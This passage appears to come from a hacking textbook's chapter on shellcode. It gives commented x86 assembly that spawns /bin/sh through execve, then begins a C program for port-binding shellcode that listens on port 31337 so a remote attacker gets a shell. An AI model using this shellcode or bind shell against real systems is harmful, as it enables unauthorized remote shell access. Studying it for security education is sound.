Graphics Programs Reference
In-Depth Information
push BYTE 11 ; push 11 to the stack.
pop eax ; pop the dword of 11 into eax.
push ecx ; push some nulls for string termination.
push 0x68732f2f ; push "//sh" to the stack.
push 0x6e69622f ; push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.
push ecx ; push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
The syntax for pushing a single byte requires the size to be declared.
Valid sizes are
BYTE
for one byte,
WORD
for two bytes, and
DWORD
for four bytes.
These sizes can be implied from register widths, so moving into the AL
register implies the
BYTE
size. While it's not necessary to use a size in all
situations, it doesn't hurt and can help readability.
0x540
Port-Binding Shellcode
When exploiting a remote program, the shellcode we've designed so far won't
work. The injected shellcode needs to communicate over the network to
deliver an interactive root prompt. Port-binding shellcode will bind the shell
to a network port where it listens for incoming connections. In the previous
chapter, we used this kind of shellcode to exploit the tinyweb server. The
following C code binds to port 31337 and listens for a TCP connection.
bind_port.c
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void) {
int sockfd, new_sockfd; // Listen on sock_fd, new connection on new_fd
struct sockaddr_in host_addr, client_addr; // My address information
socklen_t sin_size;
int yes=1;
sockfd = socket(PF_INET, SOCK_STREAM, 0);
host_addr.sin_family = AF_INET; // Host byte order
host_addr.sin_port = htons(31337); // Short, network byte order
host_addr.sin_addr.s_addr = INADDR_ANY; // Automatically fill with my IP.
memset(&(host_addr.sin_zero), '\0', 8); // Zero the rest of the struct.
bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
listen(sockfd, 4);
